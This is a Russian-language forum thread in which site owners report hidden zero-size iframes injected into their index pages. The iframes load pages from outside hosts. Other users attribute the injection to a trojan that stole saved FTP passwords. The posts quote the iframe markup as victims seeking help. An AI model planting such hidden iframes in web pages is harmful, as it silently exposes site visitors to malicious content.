Справка по антивирусному обеспечению
Доброго времени!
Имею ряд сайтов, подключенных к всеми уважаемой системе SAPE. Но 2 дня назад обнаружил интересную вещь: почти на всех этих сайтах в конец файлов index.html, index.htm, index.php (где что есть) кем-то был добавлен следующий код после тэга </HTML>: Код:
<iframe src="http://autobazar.kz/ini.php" width=1 height=1></iframe><iframe src="http://autobazar.kz/ini.php" width=1 height=1></iframe> Есть серьезное подозрение, что в скрипте sape.php есть уязвимость, позволяющая модифицировать файлы на сайтах, где он расположен. Ни у кого больше нет таких проблем? |
Вы подцепили трояна, который увел ваши пароли FTP. Сейчас такое часто бывает. Меняйте пароли, проверяйте комп, очищайте код сайта.
Sape здесь непричем |
+1 Давненько этот троян бродит.
|
Спасибо за ответы. Никто не подскажет, что это за троян? Хостинг сайтов на линуксе и не совсем понятно как его почистить. И почему тогда взломали только сайты, подключенные к sape, хотя есть и ряд других?
|
А причем тут хостинг сайтов? Вы сами то под линуксом сидите или как? А в Total Commander или каком другом менеджере пароли к некоторым сайтам не забиты были? :) Разновидностей такого трояна много, все по разному себя проявляют.
|
Я сижу под виндой. Есть антивирус, фаервол, проверялка троянов - все со свежими базами и ни одна программа ничего не показывает. Вот поэтому и озадачился. В Total Commander пароли забиты - это факт.
|
2автор: у меня после </html> стоит только <!-- Use compress gzip -->
:)))) Ищи проблему у себя. Здравая а может и больная логика подсказывает мне, что если бы было так как сказали ВЫ, то тот кто нашел бы способ изменять файлы через сапу - смог бы найти способ изменить это на ВСЕХ сайтах, а не только у Вас. |
Цитата:
Могу привести цитату с моего хостинга: Цитата:
|
блин, из ТС нада парольки убрать, хотя каспер все время работает.. мало ли что.
ЗЫЖ 2автор, повезло, не так уж и страшно. Троян вообще мог убить все файлы ;) |
Мне тоже какой-то "доброжелатель" вкатил сегодня
Код HTML:
<iframe src="http://adventureboats.co.nz/skunk/images/index.htm" scrolling="no" frameborder="0" width=0 height=0></iframe> если присадка тупо дописана во все индексы, то меняйте пароль FTP; если как-то "по-уму" - дыра в движке. И, я так понял, что такие изделия проиндексируются, как дополнительные внешние сылки. |
Часовой пояс GMT +3, время: 12:38. |
Работает на vBulletin® версия 3.8.7.
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
Перевод: zCarot
SAPE.RU — система купли-продажи ссылок с главных и внутренних страниц сайтов.